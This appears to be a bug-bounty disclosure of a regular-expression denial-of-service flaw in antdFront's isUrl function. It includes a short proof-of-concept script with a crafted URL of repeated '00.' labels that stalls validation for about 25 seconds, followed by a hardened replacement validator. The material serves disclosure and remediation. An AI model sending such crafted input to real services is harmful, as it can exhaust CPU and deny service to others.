Inefficient Regular Expression Complexity in x-neuron/antdfront
Valid
Reported on
Sep 2nd 2021
✍️ Description
A ReDoS (regular expression denial of service) flaw was found in the antdFront package. An attacker who is able to provide crafted input to the isUrl(input) function can cause the application to consume an excessive amount of CPU, because the URL-validating regular expression backtracks catastrophically on repeated host labels.
🕵️‍♂️ Proof of Concept
Create the following poc.mjs:
// poc.mjs
import { isUrl } from './antdFront/src/utils/is.js';

// Crafted input: a host made of many repeated "00." labels drives the
// regex inside isUrl into catastrophic backtracking.
var time = Date.now();
isUrl('http://foobar.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.');
var time_cost = Date.now() - time;
console.log("Time taken to validate : " + time_cost + " ms");
Clone the repository, set "type": "module" in its package.json so the ES module import resolves, and then execute the following command in another terminal:
node poc.mjs
Check the Output:
Time taken to validate : 25051 ms
💥 Impact
This vulnerability is capable of exhausting system resources and leads to crashes. Ideally, validation should be done within 1-10 milliseconds, but in the above case, it's 25 sec.
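As an added example that is not part of the original report or the antdFront project, the validator below replaces a backtracking regex with the WHATWG URL parser (linear time) and a length cap, and reuses the report's timing approach to show the crafted input no longer stalls validation. The accepted schemes, the length bound and the constructed inputs are assumptions.

```javascript
// Hardened isUrl replacement (added example, not antdFront's code):
// bounded input length + WHATWG URL parser instead of a regex.
const MAX_URL_LENGTH = 2048;                       // assumed bound; tune per application
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']); // assumed allow-list

function isUrlSafe(input) {
  if (typeof input !== 'string' || input.length === 0 || input.length > MAX_URL_LENGTH) {
    return false;                                   // reject oversized or non-string input up front
  }
  let parsed;
  try {
    parsed = new URL(input);                        // linear-time parser; throws on malformed input
  } catch {
    return false;
  }
  // Require an allowed scheme, a non-empty host, and no embedded credentials.
  return ALLOWED_PROTOCOLS.has(parsed.protocol) &&
    parsed.hostname.length > 0 &&
    parsed.username === '' && parsed.password === '';
}

// Timing harness mirroring the report's PoC: returns the verdict and elapsed ms.
function timeValidation(fn, input) {
  const start = process.hrtime.bigint();
  const result = fn(input);
  const elapsedMs = Number(process.hrtime.bigint() - start) / 1e6;
  return { result, elapsedMs };
}

// Constructed inputs: the same shape as the report's crafted string, plus a benign URL.
const CRAFTED = 'http://foobar.' + '00.'.repeat(23);
const BENIGN = 'https://example.com/path?q=1';

for (const input of [BENIGN, CRAFTED]) {
  const { result, elapsedMs } = timeValidation(isUrlSafe, input);
  console.log(`${input.slice(0, 40)}... -> ${result} in ${elapsedMs.toFixed(3)} ms`);
}
```

The crafted input is rejected or accepted in well under a millisecond either way; the point is that validation time stays flat regardless of how many labels are appended.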
We created a GitHub Issue asking the maintainers to create a SECURITY.md (2 years ago).
We have contacted a member of the x-neuron/antdfront team and are waiting to hear back (2 years ago).
We have sent a second follow up to the x-neuron/antdfront team. We will try again in 10 days (2 years ago).
We have sent a third and final follow up to the x-neuron/antdfront team. This report is now considered stale (2 years ago).
The researcher's credibility has increased: +7
ready-research has been awarded the fix bounty
This vulnerability will not receive a CVE